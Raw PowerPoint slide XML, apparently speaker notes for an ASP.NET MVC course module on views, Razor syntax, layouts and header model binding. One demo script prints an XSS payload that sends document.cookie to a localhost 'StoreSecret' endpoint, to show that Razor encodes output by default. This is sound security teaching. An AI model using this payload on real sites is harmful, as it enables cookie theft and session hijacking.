                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    &lt;ul&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        &lt;% foreach(int i in items){ %&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>            &lt;li&gt;product_@i&lt;/li&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>        &lt;% } %&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>    &lt;/ul&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Slide Number Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="11"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{89920E16-7E2D-4061-8759-5F8497A7A433}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>35</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Slide Image Placeholder 7"/>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39120032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36</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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970246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37</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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82487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38</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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749932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lvl="0" indent="0">
              <a:buFont typeface="+mj-lt"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Demo Script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Create one ASP.NET MVC website using default template and Razor engine or open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MVCRazorDemo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> project from Demos\Module 04 - Views\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>MVCRazorDemo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the example cited in the slides to show how to specify code expressions and code blocks in a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Razor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> view.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show code behind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>_Layout.cshtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Show how it is being used in other views for standard layout.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show code behind </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>ViewStart.cshtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> referring to </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>_Layout.cshtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" lvl="0" indent="-228600">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Show how views still use layout even if the layout section of a view is removed. However, when layout property is set to an empty string, no layout is used by the view.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>39</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21049632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pPr/>
              <a:t>40</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4164979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After completing this module, you will be able to:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand the View Fundamentals.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MVC vs Razor Pages</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Develop new Views.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Understand Razor syntax and the Razor View Engine.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{675416BA-65F7-274A-AD61-D0FA78F3AA6E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0">
                <a:solidFill>
                  <a:prstClr val="black"/>
                </a:solidFill>
              </a:rPr>
              <a:pPr/>
              <a:t>4</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:prstClr val="black"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Image Placeholder 6"/>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3071152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lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Demo Script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Open Demos\Module 04 - Views\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>MVCRazorDemo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> and insert following lines in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Index.cshtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> page.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Try to perform a simple XSS attack. Uncomment the line in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>HomeController.cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> that sets </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ViewData</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>[</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Message</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>"</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>]</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Razor will encode it by default.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="173028" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>&lt;script&gt;document.write('&lt;img src=http://localhost:62628/StoreSecret/Store?id</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>='+escape(document.cookie)+ '/&gt;')&lt;/script&gt;</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>41</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5473718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lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Demo Script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Open Demos\Module 04 - Views\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>BindingDemo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Show the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>HomeController.cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> file, About method. Show that About action receiving </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>HeaderModel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> class and that </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>autopreperties</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> marked</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>FromHeader</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> attribute and will extract</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>AcceptEncoding</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t> property from the request header.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Set a breakpoint in  About method. Run the demo. Open Developer tools in any browser you prefer-&gt; network tab.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" sz="1050" b="0" kern="1200" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Show that headers mapping to property in a simple/solid model.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>42</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30245607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791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>43</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="10212634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a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>44</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29370008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pPr/>
              <a:t>45</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="6924176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pPr/>
              <a:t>46</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32766070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pPr/>
              <a:t>47</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="36579044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pPr/>
              <a:t>48</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="38168720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dirty="0"/>
              <a:t>A view can define only the sections that are referred to in the layout. The MVC Framework will throw an exception if you attempt to define the sections in the view for which there is no corresponding @RenderSection helper call in the layout convention defined at the start and/or end of the view – you can also render for Body.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Use the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>@RenderSection (“name”, FALSE)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> to make a section optional (otherwise it will throw an exception if the section is not defined in the view; you can also test for a section using “IsSectionDefined”</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{537ED7AC-D90E-44FA-813E-55CE8F1A06C9}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>49</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Slide Image Placeholder 6"/>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27132697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lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Demo Script:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Open Demos\Module 04 - Views\</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>MVCRazorDemo</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>Show _</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>Layout.cshtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t>  &amp; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0" err="1"/>
              <a:t>ViewImports</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="0" dirty="0"/>
              <a:t> files.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Slide Number Placeholder 3"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{BE9EEB41-EBB5-4D09-977D-3A6E65EE327B}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>50</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1273986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3884613" y="8791575"/>
            <a:ext cx="2971800" cy="352425"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{675416BA-65F7-274A-AD61-D0FA78F3AA6E}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>5</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>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pPr marL="0" lvl="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Section Overview:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>This section discusses the following topics:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Role of views</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
